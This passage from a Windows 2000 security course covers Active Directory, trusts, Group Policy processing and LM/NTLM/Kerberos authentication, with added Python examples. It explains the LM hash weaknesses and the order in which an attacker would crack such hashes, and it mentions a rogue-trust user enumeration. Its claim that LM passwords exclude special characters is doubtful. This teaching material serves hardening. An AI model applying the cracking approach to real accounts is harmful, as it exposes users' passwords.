In addition to the information mentioned earlier, AD holds the information regarding access control. When a user logs on to the network, he or she is authenticated by information that has been stored in the Active Directory. When a user attempts to access an object, the information required to authorize such access is also stored in the Active Directory, and is called the Discretionary Access Control List (DACL).

Another critical component of Windows 2000 is DNS. The reason this is critical is the dependence of AD on DNS. Active Directory relies on DNS to provide the naming information required to locate resources on the network.

Active Directory Logical Structure

The main component behind the structure of Active Directory is the domain. A Windows 2000 AD network is comprised of at least one domain, but is not limited to one. Microsoft has termed the objects stored inside a domain as interesting. These interesting objects are defined as those objects which a user needs in the course of doing his or her job function. Examples of interesting objects include printers, databases, email addresses, other users, and more. Each domain holds information about all of the objects in the domain, and only those objects that belong to the domain. Domains are allowed to span one or more physical locations.
Logical Layout of a Windows 2000 Active Directory Network

Figure 4-1: A graphical example of the logical network layout of a Windows 2000 Active Directory network.

The domain itself is used as a boundary within which security controls can be put in place. The Access Control List (ACL) is used to regulate specific access to domain objects, such as shared folders, for defined users. The ACL contains the permissions that are used to grant or deny access for an object, such as a user or group, to another object, such as a file, folder, or printer. Within a domain itself you can have Organizational Units, or OUs. An OU is a logical holder that is used to further mirror the logical structure of the organization. An OU can contain users, groups, shared folders and printers, and even other OUs from the same domain. Every domain in the network can have a unique OU configuration; there is no dependency on other domains. Security policies and policies concerning computer and user behavior (Group Policies) can be assigned to a stand-alone computer, a site, a domain, or an OU, as appropriate. It is possible to assign policies to each OU, but it is not required that you do so. If there is a policy that you want all of the OUs in the network to use, you can assign it to the parent OU or to the domain, because the default behavior is to allow child objects to inherit policies from their parents within the Active Directory. Another important item to note is that these Group Policies are themselves objects in AD; therefore, permissions can be assigned to them. For a policy to take effect upon an object, that object should have at least the Read and Apply Group Policy permissions for that policy.

Possible OU Contents

Figure 4-2: A logical view of the objects an OU can contain.

Domain Trees Use DNS Naming

Another new concept in Windows 2000 is that of forests and trees. A tree is a logical structure, created by the network design team, of one or more Windows 2000 domains that share a namespace. The domains fall in a hierarchical structure and follow DNS naming standards. As shown in Figure 4-3, child domains of SecurityCertified.Net use the parent names in their naming structure.

Figure 4-3: A domain tree for Windows 2000 using DNS naming standards.

Two Domain Trees Linked to Make a Forest

Figure 4-4: Two unique domain trees tied together to make a forest.

In the Windows 2000 Active Directory structure, a forest is a collection of one or more independent domain trees. These independent trees are linked together with a trust, which will be defined in a moment. Each tree in the forest maintains its proper DNS naming system, and there is no requirement for any similar namespace from one tree to another. Each domain still functions on its own, but the logical connection of the forest enables enterprise-wide communication on the network. The new Windows Server 2003 (.NET) architecture will take this one step further: trusts can be implemented between forests to create a Federation. Figure 4-4 shows a forest of two trees.

The implementation of trust in a Windows 2000 Active Directory network is quite different from the Windows NT 4.0 implementation. In Windows 2000, all trusts between domains are, by default, two-way transitive trusts. These trusts, based on Kerberos version 5, are created automatically when a new domain is added to the tree. The domain that started the tree is considered the root domain, and each subsequent domain will form a two-way transitive trust upon joining the tree. It is due to this trust that users and computers from any domain are able to be authenticated at any other domain in the tree or forest. (The authorization is based on setting the appropriate permissions to do so.)

A transitive trust means that if Domain C trusts Domain B, and Domain B trusts Domain A, then Domain C also trusts Domain A.

When older Windows domains are on the network, such as Windows NT 4.0 domains, a specific trust can be created. This is called an explicit one-way trust, and it is nontransitive. This way, a Windows 2000 network, running Active Directory, can have communications with an older Windows NT 4.0 domain.

Another option for manually creating trusts is to connect two Windows 2000 domains that are far down the trees of different forests. This can help to speed up communication between the two domains. These are known as shortcut trusts. While discussing trust, one interesting thing to note, from a security professional's perspective, is how an attacker can take advantage of trust with only a rogue laptop running a Windows NT 4.0 domain and a network connection to a default installation of a Windows 2000 domain. Such a rogue machine can offer its trust to the Windows 2000 domain and obtain the complete list of users and groups from the Windows 2000 domain without any authentication whatsoever. However, this vulnerability has been addressed in the Microsoft Security Rollup package.
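The difference between the automatic two-way transitive trusts of a tree or forest and an explicit one-way nontransitive trust to a Windows NT 4.0 domain decides which domains can authenticate whose accounts. The following Python model is an added example, not part of the course materials: it records trusts as a directed graph and answers "can this domain authenticate an account from that domain?" by following direct trusts of either kind and longer paths only over transitive hops. The forest is constructed for the example; apart from SecurityCertified.Net from Figure 4-3, every domain name is made up.

```python
from collections import deque

# Trust graph: trusting_domain -> list of (trusted_domain, transitive).
# "A trusts B" means that resources in A accept accounts authenticated by B.


def add_trust(trusts, trusting, trusted, transitive=True, two_way=True):
    """Record a trust. Tree and forest trusts in Windows 2000 are two-way and
    transitive; an explicit trust to a Windows NT 4.0 domain is one-way and
    nontransitive, so it is stored in one direction only."""
    trusts.setdefault(trusting, []).append((trusted, transitive))
    if two_way:
        trusts.setdefault(trusted, []).append((trusting, transitive))


def can_authenticate(trusts, resource_domain, account_domain):
    """Can resource_domain authenticate an account from account_domain?

    A direct trust of either kind is enough.  A longer path is valid only when
    every hop on it is transitive, which is what the lesson's rule "C trusts B
    and B trusts A, so C trusts A" amounts to; a nontransitive trust is never
    extended past the domain it points at.
    """
    if resource_domain == account_domain:
        return True
    seen = {resource_domain}
    queue = deque([resource_domain])
    while queue:
        current = queue.popleft()
        for trusted, transitive in trusts.get(current, []):
            direct = current == resource_domain
            if trusted == account_domain and (direct or transitive):
                return True
            if transitive and trusted not in seen:
                seen.add(trusted)
                queue.append(trusted)
    return False


def build_sample_forest():
    """Constructed two-tree forest plus a legacy NT 4.0 domain (names made up)."""
    trusts = {}
    # Tree 1: the root and two generations of child domains, joined automatically.
    add_trust(trusts, "sales.securitycertified.net", "securitycertified.net")
    add_trust(trusts, "east.sales.securitycertified.net", "sales.securitycertified.net")
    # Tree 2 keeps its own namespace; linking the roots makes the forest.
    add_trust(trusts, "corp.example.test", "example.test")
    add_trust(trusts, "example.test", "securitycertified.net")
    # A legacy domain reachable only through an explicit one-way nontransitive trust.
    add_trust(trusts, "sales.securitycertified.net", "NT4LEGACY",
              transitive=False, two_way=False)
    return trusts


if __name__ == "__main__":
    forest = build_sample_forest()
    for resource, account in [
        ("east.sales.securitycertified.net", "corp.example.test"),
        ("sales.securitycertified.net", "NT4LEGACY"),
        ("east.sales.securitycertified.net", "NT4LEGACY"),
        ("NT4LEGACY", "sales.securitycertified.net"),
    ]:
        print(f"{resource} accepts accounts from {account}: "
              f"{can_authenticate(forest, resource, account)}")
```

The last two cases are the ones worth remembering when reviewing a trust design: the NT 4.0 domain's accounts stop at the domain that explicitly trusts them, and nothing in the forest is visible from the NT 4.0 side of a one-way trust.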

Active Directory Physical Structure

Although the majority of the design and implementation of the Active Directory network is on the logical side, the physical side must also be addressed. The main components of the physical side of Active Directory are sites, the links between the sites, and the Domain Controllers. The site, as defined by Microsoft, is a combination of one or more Internet Protocol (IP) subnets connected by a highly reliable and fast link, to localize as much network traffic as possible. A link is generally considered fast when the connection speed is at least 512 Kbps. In other words, the site is designed to mirror the physical structure of your network and may or may not be made up of different IP subnets. Remember that the domain is designed to mirror the logical needs of the network; the site applies that same thinking to the physical aspects of the network. There is no correlation between the site and the domain. It is possible to have multiple domains in a site, and it is possible to have multiple sites for one domain.

A site is also not part of the DNS namespace. This means that when browsing the directory, you will see user and computer accounts managed by domain and/or OU, but not by site. The only things a site contains are Computer objects and objects relevant to the connection and replication from one site to another.

The other component of the physical makeup of Active Directory is the actual Domain Controllers (DCs) themselves. These machines, which must be running Windows 2000 Server, each have an exact replica of the Domain Directory. In fact, when making a change on a DC that has an effect on the Active Directory, all other DCs will receive this replicated change. Because any domain controller can authenticate a user to the network, each controller is required to have this Directory. The basic breakdown of the Domain Controller in terms of what it provides to the network is:

Each DC stores a copy of Active Directory information that is relevant to that domain (also referred to as an AD partition).

Each DC replicates changes, at admin-defined intervals, to all the other DCs to ensure a consistent view of the network.

Each DC replicates critical changes to all the other DCs immediately.

Each DC is able to authenticate user logon requests.

Windows 2000 DNS

In order for the Active Directory to function in any capacity, DNS must be running for the network. The implementation of the DNS namespace will be the foundation on which the AD namespace is built. By following this procedure, you are able to have fluid IP communication, using names that users are familiar with, across the network and on the Internet.

A new feature of Windows 2000 is Dynamic DNS (DDNS). DDNS enables clients that receive their IP addresses automatically (via a DHCP server) to have their names and IP addresses registered with the network. With a DDNS server running in the network, the client machines will automatically communicate with the server, announcing their name and address combinations, and will update DNS information with no user intervention required.

One of the advantages to running DDNS in a network is the ability to eliminate other protocols and services that might be running in order to locate resources. For example, the Windows Internet Name Service (WINS) of Windows NT 4.0 is no longer required, and the use of NetBEUI as a communication protocol is no longer required, but might be needed to provide backward compatibility.

Group Policy Components

The final component of the Windows 2000 infrastructure we are going to discuss is the group policy. A group policy is a logical grouping of user and computer settings that can be applied to computers, domains, OUs, and sites. For example, you can configure a group policy setting to remove objects from the Start menu.

When you configure group policy settings, they are placed in what is called a Group Policy Object, or GPO. The GPO is then responsible for controlling the application of the policy to Active Directory objects, such as sites, OUs, and domains. Once a GPO is configured, it is applied to the AD object as assigned, and by default, the policy will affect all computers that are in the AD object.

Having the policy affect all computers may not be your desired result, so you do have the ability to filter how the policy will be implemented for computers and users. The filtering will use Access Control Lists (ACLs), as designed by you. Some of the rules for applying a GPO are as follows:

A GPO can be associated with more than one domain.

A GPO can be associated with more than one OU.

A domain can be associated with more than one GPO.

An OU can be associated with more than one GPO.

As you can see, you are allowed a lot of flexibility in GPO implementation. However, before getting too far into the implementation, you must take a step back and look into the GPO itself in more detail.

Group Policy Implementation

To start with the configuration of a GPO, you must open and use the Group Policy Editor. As with most of the management options in Windows 2000, this can be opened via the Microsoft Management Console (MMC).

In the Group Policy Editor, you are presented with two parent objects to manage, User Configuration and Computer Configuration. This is where you will create the GPOs that you will later apply as per your requirements. The Computer Configuration node provides the option to manage the behavior of the operating system, account policies, IP security policies, and more.

The User Configuration node provides the option to manage behavior that is unique to the user, such as Desktop settings, Control Panel settings, Start menu settings, and more.

TASK 4A-1
Configuring a Custom MMC and GPO

1. Boot your computer to Windows 2000, and log on as Administrator.

2. From the Start menu, choose Run and enter mmc into the Run dialog box to start the default Microsoft Management Console.

3. Choose Console→Add/Remove Snap-In.

4. Click the Add button.

5. Scroll down in the list, select Group Policy, and click Add.

6. You will be asked to select the location for the Group Policy Object. Leave the GPO selection of storing on the local computer, and click Finish.

7. Click Close, and then click OK to close the Add/Remove Snap-in window.

8. Choose Console→Save, and save this console as Custom_GPO. The new Console object you created will now be available in your Administrative Tools and can be accessed through the Start menu. You might also want to create a shortcut to it on the Windows Desktop.

Editing GPOs

Once you have created GPOs, you can edit and further customize them. Bear in mind that GPOs themselves are AD objects. Therefore, you can make copies of GPOs, not actually apply them but save them to a file, and email them to another administrator in your company and have him tweak them further for the task at hand. In the following task, you will edit your GPO to control password settings in the domain.

TASK 4A-2
Editing a GPO

Setup: You are logged on to Windows 2000 as Administrator, and the Custom_GPO console is running.

1. Expand Local Computer Policy.

2. If necessary, expand Computer Configuration.

3. Expand Windows Settings.

4. Expand Security Settings.

5. Expand Account Policies, select Password Policy, and double-click the Enforce Password History option.

6. For the number of passwords to remember, enter 5 and click OK.

7. Right-click the Maximum Password Age option and choose Security.

8. For the maximum age of passwords, enter 30 days and click OK.

9. If you are prompted to change related values, click OK to reset the Minimum Password Age.

10. Observe the console. The Local Settings you just adjusted are different from the currently effective (default) settings. However, if you close and reopen the GPO, the altered settings will become the effective settings.

11. Close the Custom_GPO without saving settings, and then reopen it. Verify that the local and effective settings match.

Enforcing GPOs

Once you create and edit a GPO, it must be enforced to have any effect on the network. As discussed, there can be GPOs on sites, domains, and OUs, so being aware of the order of implementation is critical to proper GPO deployment.

1. The first GPO that is processed is the local GPO. Every Windows 2000 computer has a GPO stored locally. Although this is the first GPO processed, it is not practical to implement custom configurations on each machine on the network, so often administrators move right past the local GPO.

2. After the local GPO is processed, the site GPO is implemented. Because there can be multiple GPOs for one site, it is up to the administrator to define the order of implementation, which is done in the Site Properties.

3. Once the site GPO has been processed, the domain GPO is implemented. Just as there can be multiple GPOs for a site, there can be multiple GPOs for a domain, so the administrator must take care to define the order of implementation here as well.

4. The final GPO to be processed is the OU GPO. Again, as in the other implementations, more than one GPO may be present for the OU, and, as such, the administrator is required to properly plan and implement the GPOs as desired.

In each location (site, domain, or OU) where there can be more than one GPO, the place to modify the GPO order is in the Properties of the location. For example, in the Site Properties, when multiple GPOs are listed, the option to move them Up or Down is present. The system will process the GPOs highest on the list as having the highest priority, taking precedence over GPOs that are lower on the list.

Knowledge of the implementation order of the GPOs is critical for anyone who works to secure and manage a Windows 2000 network. By looking at the implementation order, you can identify that if a site GPO was defined to disable the Restrict CD-ROM Access To Locally Logged-on User Only setting, and the domain GPO was to define that same setting as Enabled, then the setting for computers belonging to that site and domain would be enabled, as the domain GPO was processed after the site GPO.

TASK 4A-3
Implementing Multiple GPOs

Objective: To examine the impact of implementing GPOs at different levels and to determine the final policy settings that will be in effect.

If students are interested and time permits, you might want to demonstrate the GPO implementation shown here so that students can see the resulting policy settings. If so, you will need to run dcpromo to install Active Directory.

1. You have been assigned to define Internet Explorer settings for users in your enterprise, and you decide to experiment with defining GPOs at various levels. If you define the following GPOs, what will the final result be when a user in this OU logs on and runs IE?

At the site level, the Configure Toolbar Buttons policy is to be Enabled, and the Show Back Button and Show Home Button options are checked.

At the domain level, the Configure Toolbar Buttons policy is to be Enabled, the Show Back Button option is unchecked, and the Show Stop Button option is checked.

At the OU level, the Configure Toolbar Buttons policy is to be Enabled, and the Show Search Button and Show History Button options are checked.

The user will see the Home, Stop, Search, and History buttons.
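The processing order (local, site, domain, OU) and the within-container priority list are what decide the answer to Task 4A-3. The following Python model is an added example, not part of the course materials: it applies linked GPOs level by level so that a later level overrides an earlier one, applies the GPO at the top of a container's list last so that it wins within its level, and treats a Not Configured value as leaving the earlier setting alone. The per-button options of the Configure Toolbar Buttons policy are merged individually, which is how the task's own answer treats them, and the three GPOs are constructed to match the task text.

```python
# Processing order: local GPO first, then site, domain and OU.  A setting written
# by a later level replaces the same setting written by an earlier level.
LEVEL_ORDER = ("local", "site", "domain", "ou")

# Display order of the buttons governed by the Configure Toolbar Buttons policy.
TOOLBAR_BUTTONS = ("Back", "Home", "Stop", "Search", "History")


def effective_settings(gpo_links):
    """Merge the linked GPOs into the settings a user in the OU actually gets.

    gpo_links maps a level name to the GPOs linked there, listed as they appear
    in that container's Properties: index 0 is the top of the list and has the
    highest priority, so it is applied last within its level and wins there.
    Each GPO is a dict of setting -> value; None means Not Configured and is
    skipped, so an earlier GPO's value for that setting survives.
    """
    effective = {}
    for level in LEVEL_ORDER:
        for gpo in reversed(gpo_links.get(level, [])):
            effective.update({k: v for k, v in gpo.items() if v is not None})
    return effective


def visible_toolbar_buttons(effective):
    """Buttons shown when Configure Toolbar Buttons ends up Enabled, or None
    when the policy is not enforced and IE's own defaults apply."""
    if effective.get("configure_toolbar_buttons") != "Enabled":
        return None
    return [b for b in TOOLBAR_BUTTONS if effective.get(f"show_{b.lower()}", False)]


def task_4a3_links():
    """The three GPOs of Task 4A-3, constructed to match the task text."""
    return {
        "site": [{"configure_toolbar_buttons": "Enabled",
                  "show_back": True, "show_home": True}],
        "domain": [{"configure_toolbar_buttons": "Enabled",
                    "show_back": False, "show_stop": True}],
        "ou": [{"configure_toolbar_buttons": "Enabled",
                "show_search": True, "show_history": True}],
    }


if __name__ == "__main__":
    print(visible_toolbar_buttons(effective_settings(task_4a3_links())))
```

The same function reproduces the Restrict CD-ROM Access example from the text (site Disabled, domain Enabled gives Enabled) and the within-level rule that the top GPO in a container's list overrides those below it; both are worth checking against a real design before you rely on a site-level GPO to lock something down.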

Topic 4B
Windows 2000 Authentication

Despite all the advancements and new components of Windows 2000, one thing remains the same: a user must be authenticated to access resources on the network. Where Windows 2000 starts to look new in comparison with earlier versions is with the methods of authentication that it can use. Windows 2000 can use any of the following for authentication: Kerberos, NTLM, NTLMv2, LM, RADIUS, SSL, Smart Cards, and more.

Windows 2000 uses what is called the Security Support Provider Interface (SSPI) to allow for these methods of authentication. The SSPI functions between the user applications, such as the Web browser, and the authentication method, such as NTLM or Kerberos. This means that an application developer need not create an application for each type of authentication, but rather can create one application that can communicate with SSPI.

Although the SSPI plays an important function in the authentication of users, it is not something that administrators spend time with, as there are no options for configuration or management involved in the SSPI. It simply sits and performs its job of connecting authentication requests to the authentication provided by the system. Where the authentication process starts to involve the administrators more is in the security architecture of Windows 2000. The security architecture of Windows 2000 is comprised of parts of both the operating system and Active Directory. For example, account information and policy settings are stored in AD, while the OS holds the security process that is implemented and information regarding trusts to and from other areas of the network.

SSL: (Secure Sockets Layer) A session layer protocol that provides authentication and confidentiality to applications.

security architecture: A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements.

Authentication Methods

If you have installed a new Windows 2000 domain, and all machines are running Windows 2000, the default method of authentication is Kerberos. You can, of course, change the authentication method, but the default will be Kerberos.

If you have installed a new Windows 2000 domain, it is in what is called mixed mode. In a mixed-mode network, there can be both Windows NT 4.0 BDCs and Windows 2000 domain controllers present. This allows for maximum communication options over the network, but does not present the most secure environment, because you must support authentication options for two systems.

In earlier OSs, before Windows NT 4.0 with Service Pack 4 (SP4), there were only two supported methods of what is called challenge/response authentication. Those two methods were LAN Manager (LM) and Windows NT LanMan (NTLM). Windows 2000 has increased the security by adding NTLMv2.

LM Authentication

In order to provide maximum compatibility, the ability to communicate with older systems is a requirement. If the older systems are using LAN Manager authentication, this can introduce a vulnerability to the network.

vulnerability: Hardware, firmware, or software flaw that leaves an AIS open for potential exploitation. A weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS.

In Windows systems, passwords are not stored or visible anywhere in their plaintext versions, for good reason. Instead, they are stored as hashes, or one-way encrypted character sets that represent the passwords. The way that an LM hash is created also presents a potential weakness. The LM password can be a maximum of 14 characters.

LM authentication uses a password that is based on the standard character set. This means that no special characters can be included in passwords, which is an obvious weakness. Additionally, the passwords are not case-sensitive. A password can be typed in upper- and lower-case letters, but the system will always convert the letters to all upper case, again an obvious weakness.

The Generation of an LM Hash

The computer will take the 14-character, all-upper-case password and split it into two 7-character chunks. Each character space is one byte, so in essence there are now two 7-byte values. Each 7-byte value is used as the key for DES to encrypt a 64-bit constant value. The output of the encryption on both sides creates a unique value. These two values are then listed next to one another to provide the final hash value. Figure 4-5 shows this process.

Figure 4-5: The generation of an LM hash.

Once the hash value has been calculated, you can look at it and see a long string of characters, thinking it looks secure. But the weaknesses of LM hashing quickly become apparent. The first issue is the character set. Because only standard characters can be used, the character set is limited to 26 letters over 14 character positions, or a full password space of 26^14, which is approximately 10^19. This is a string of 65 bits that would need to be cracked. However, the second issue, the split in the password, comes quickly into play. In the previous example, the password was split into two chunks, MYPASSW and ORDISLO. These two chunks can be attacked at the same time. So, the password space is actually 26^7 + 26^7, or approximately 10^10. This is now a full string of only 32 bits to crack, and each half can be cracked at the same time, reducing the bit space further. The second half of the password will generally be attacked first. This is due to the fact that most people do not use a password that is a full 14 characters. So, in cracking this half, there may be fewer calculations to make. Secondarily, the characters that are cracked can reveal clues as to the first half of the password.

Lesson 4: Hardening Windows Computers
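The following is an added example, not code from the course or from Microsoft, that walks through the LM pre-processing just described: case folding, NUL padding to 14 bytes, the split into two 7-byte halves, and the expansion of each half into the 64-bit (56 bits plus parity) key that DES takes. The DES encryption of the constant itself is deliberately left out; what matters for the weakness is the shape of the input. It assumes single-byte (latin-1) encoding as a stand-in for the OEM code page, and the sample passwords are constructed.

```python
# Added example (not from the course): the LM pre-processing described above.
# Shown: case folding, padding to 14 bytes, the 7-byte split, and the expansion
# of each 7-byte half into a 64-bit DES key. The DES step itself (encrypting the
# fixed 64-bit constant under each key) is left out; the point is the structure
# of the input, which is where the weaknesses come from.
import math

LM_BLOCK_LEN = 14   # maximum LM password length in bytes
HALF_LEN = 7        # each half becomes a 56-bit DES key


def lm_halves(password: str) -> tuple:
    """Upper-case, truncate or NUL-pad to 14 bytes, split into two 7-byte halves.
    Assumption: single-byte characters (latin-1 stands in for the OEM code page)."""
    upper = password.upper().encode("latin-1", "replace")
    padded = upper[:LM_BLOCK_LEN].ljust(LM_BLOCK_LEN, b"\x00")
    return padded[:HALF_LEN], padded[HALF_LEN:]


def des_key_from_7_bytes(half: bytes) -> bytes:
    """Spread the 56 bits of a half over 8 bytes, 7 bits per byte, with an odd
    parity bit in bit 0 of each byte: the 64-bit key form that DES consumes."""
    if len(half) != HALF_LEN:
        raise ValueError("a half must be exactly 7 bytes")
    bits = int.from_bytes(half, "big")
    key = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F     # next 7 key bits, MSB first
        byte = seven << 1
        if bin(seven).count("1") % 2 == 0:       # make the byte's parity odd
            byte |= 1
        key.append(byte)
    return bytes(key)


def lm_des_keys(password: str) -> tuple:
    """The two DES keys that would each encrypt the constant to form the LM hash."""
    first, second = lm_halves(password)
    return des_key_from_7_bytes(first), des_key_from_7_bytes(second)


def second_half_is_padding(password: str) -> bool:
    """True for passwords of 7 characters or fewer: the second half is then all
    NUL padding, so its DES output is the same for every such password and the
    stored hash itself reveals that only 7 characters are in use."""
    return lm_halves(password)[1] == b"\x00" * HALF_LEN


def search_space_bits(charset_size: int, length: int) -> float:
    """log2 of the number of candidates of `length` characters from the charset."""
    return length * math.log2(charset_size)


if __name__ == "__main__":
    for pw in ("MyPasswordIsLong", "secret"):          # constructed samples
        print(pw, lm_halves(pw), second_half_is_padding(pw))
    print("whole 14-char space: %.1f bits" % search_space_bits(26, 14))
    print("one 7-char half:     %.1f bits" % search_space_bits(26, 7))
```

Running it shows the same split the figure uses (MYPASSW / ORDISLO) and, for a short password, a second half consisting only of padding; the bit figures are the 26^14 and 26^7 values from the text.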

NTLM Authentication

When Microsoft was developing Windows NT, an opportunity was taken to improve on the weaknesses of LM authentication. The result was the Windows NT LAN Manager (NTLM) authentication method. A primary enhancement that NTLM offered over LM was that the character set could now include the full Unicode set. This allowed for characters outside of letters and allowed for upper- and lower-case letters. This was a significant improvement. The password was now seen by the system as 14 16-bit Unicode characters. The 14 characters were then converted into a 128-bit hash value by using Message Digest #4 (MD4), developed by Ron Rivest. This is what is commonly referred to as the NTLM hash. Figure 4-6 shows the generation of an NTLM hash.

The Generation of an NTLM Hash

Figure 4-6: The generation of an NTLM hash.

Although having a full 128-bit hash space to attack provides better protection against attacks, there is an issue with the implementation of the new NTLM in Windows. In order for Windows to remain backward-compatible, it was decided to also store an equivalent LM hash. This would allow newer Windows computers to communicate with older systems.

Because Windows stores both the NTLM and LM values for each user, an attacker will work on cracking the LM hash first. Once that is recovered, the attacker can run a simple brute-force test to determine the case of the letters found. The NTLM and LM values are stored in the Windows Registry, in the SAM.

Hardening The Infrastructure (SCP)

SYSKEY

Windows stores both the LM and NTLM hashes in the Registry. This is yet another reason for proper security controls on Registry access. However, if the SAM can be pulled off the computer, from a Recovery Disk, or if the SAM can be dumped from the Registry using software, extra security is required. Microsoft introduced a means of securing the SAM called System Key, or SYSKEY for short. SYSKEY uses a secret 128-bit key to provide encryption on the SAM database, making it more difficult to pull the hashes off a disk and crack them. SYSKEY needed to be added to a Windows NT system and is included in Windows 2000 by default.

A common question is: Where do I store, or what do I do with the SYSKEY value itself? The key must be available and must be protected. There are three options for managing SYSKEY on a system:
1. Allow the computer to generate a random key as the System Key and store the key somewhere in the Registry. The key will then be used when the system restarts, and input from the user who started the system is not required.
2. Allow the computer to generate a random key and store the key on a floppy disk. The system will prompt for the disk during startup.
3. Create a password and remember the password. Enter the System Key when prompted during the startup sequence.

NTLMv2

NTLMv2 was introduced in the continuing line of evolving authentication. NTLMv2 allows for control over the use of traditional LM by the client and the server. Additionally, NTLMv2 uses MD5 to create the hash. The 128-bit NTLMv2 also provides session confidentiality and integrity. In the event that NTLMv2 is used where the United States export restrictions are not met, it will be installed in 56-bit mode.

The addition of the controls on the backward-compatible features of LM is a significant improvement to the security of the network. Figure 4-7 shows where the settings of the authentication options are made.

Figure 4-7: Local Security Policy options for authentication.

The Challenge and Response

All of the authentication methods discussed so far, LM, NTLM, and NTLMv2, use what is called Challenge Response authentication. Without assigning specific numbers to the sequence of events, the following steps define the general process of the challenge response system:
1. The client initiates the authentication process by bringing up the logon screen and requesting to log on.
2. The server sends a random string of characters to the client. This is called the challenge.
3. The client enters a username and password. The hash of the user's password encrypts the challenge characters and returns the encrypted value. This is called the response.
4. The server encrypts the challenge using the stored hash of the user's password. If the server's value matches the client's value, the user is authenticated.

Windows 2000 Local Logon Process

There are two methods used when you log on to a Windows 2000 Server or Professional computer locally. The two authentication methods are Kerberos and NTLM. Kerberos is the main method, and in the event that Windows cannot find a KDC (Key Distribution Center), Windows will revert to NTLM for authentication to the local machine, using the local SAM (Security Accounts Manager) database. The process of logging on to the local system using NTLM is:
1. A user enters his or her user name and password. These credentials are collected by the Graphical Identification and Authentication (GINA) component of Windows.
2. GINA hands off the entered information to the Local Security Authority (LSA) for authentication. The LSA is what creates the access tokens, provides an interactive environment for user authentication, controls the local security policy, and sends authentication requests to NTLM or Kerberos, as required.
3. LSA will then hand off the information to the SSPI, which will give the authentication request to the NT LAN Manager (NTLM) driver, called MSV1-0 SSP. (At this stage, if Kerberos is being used, SSPI would hand off to Kerberos.)
4. The NTLM driver uses the Netlogon service to authenticate the user credentials with the local SAM database.
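The following is an added example, not code from the course or from Microsoft. It computes an NTLM hash exactly as the NTLM Authentication section describes (MD4 over the password as 16-bit Unicode) and then plays out the four challenge and response steps above with one function per step. MD4 is implemented in the block because hashlib's md4 is disabled in many OpenSSL builds. The response is modelled as an HMAC-MD5 over the server challenge keyed with the NT hash, in the spirit of NTLMv2's use of MD5; it is a simplified model, not the exact on-the-wire message format.

```python
# Added example (not from the course): an NTLM hash computed as described in the
# text (MD4 over the UTF-16LE password) and a challenge/response exchange
# modelled on the four steps above. MD4 is implemented here because hashlib's
# md4 is disabled in many OpenSSL builds. The response is an HMAC-MD5 over the
# server challenge keyed with the NT hash: a simplified model in the style of
# NTLMv2, not the exact wire format.
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(message: bytes) -> bytes:
    """RFC 1320 MD4."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = message + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(message) * 8)          # bit length, little-endian
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c             # rotate the working variables
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> bytes:
    """The NT hash: MD4 of the UTF-16LE password. There is no salt, so two users
    with the same password end up with the same stored hash."""
    return md4(password.encode("utf-16-le"))


# --- challenge/response, one function per step of the exchange in the text ---

def step2_server_challenge() -> bytes:
    """Step 2: the server sends a random challenge."""
    return os.urandom(8)


def step3_client_response(password: str, challenge: bytes) -> bytes:
    """Step 3: the client keys a MAC with the hash of its password and applies it
    to the challenge; neither the password nor the hash leaves the client."""
    return hmac.new(ntlm_hash(password), challenge, hashlib.md5).digest()


def step4_server_verify(stored_hash: bytes, challenge: bytes, response: bytes) -> bool:
    """Step 4: the server repeats the computation with the stored hash and compares.
    Anyone holding the stored hash can produce a valid response, which is why the
    SAM (and SYSKEY) need protecting as much as the password itself."""
    expected = hmac.new(stored_hash, challenge, hashlib.md5).digest()
    return hmac.compare_digest(expected, response)


if __name__ == "__main__":
    stored = ntlm_hash("password")                   # constructed sample credential
    ch = step2_server_challenge()
    print(step4_server_verify(stored, ch, step3_client_response("password", ch)))
    print(step4_server_verify(stored, ch, step3_client_response("Password", ch)))
```

The second verification fails because NTLM, unlike LM, preserves case: "Password" and "password" hash differently.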

Kerberos in Windows 2000

Kerberos is an IETF standard used for authentication. It was developed by the Massachusetts Institute of Technology during the 1980s. As an authentication method, it is considered to be a secure method and had been implemented in other operating systems before the Windows 2000 implementation. There is a bit of controversy about the method used in Windows systems, as it varies slightly from the standard created by MIT. However, it should be noted that Windows 2000 is able to interoperate with non-Windows 2000 machines running Kerberos.

If you have a Windows 2000 domain up and running, and you want to implement Kerberos, all you have to do is nothing! Kerberos will be used by default to authenticate network clients (who must be running Windows 2000) logging onto a Windows 2000 domain.

Although it is beyond the scope of this course to get into the details of Kerberos operation, you should be familiar with the fundamental issues of its function for authentication purposes.

When a user begins the logon process by entering their credentials (a username and password, a smart card, or biometrics), Windows contacts an Active Directory domain controller and locates the Kerberos Key Distribution Center (KDC). [An Authentication Server (AS) is what performs the actual authentication.] The KDC responds by issuing a Ticket Granting Ticket (TGT) to the authenticated user. The TGT contains identification information about this user for various servers on the network and is used to gain further access in the network.

Once the user account has been authenticated, the TGT is used to request further Kerberos tickets in order to access network services. The machine that provides the tickets for the network resources to the authenticated client is called a Ticket Granting Server (TGS).

To summarize: An Authentication Server (AS) is used to perform the actual authentication of the Kerberos client. In a Windows 2000 implementation, this is configured as a service called the Authentication Service.

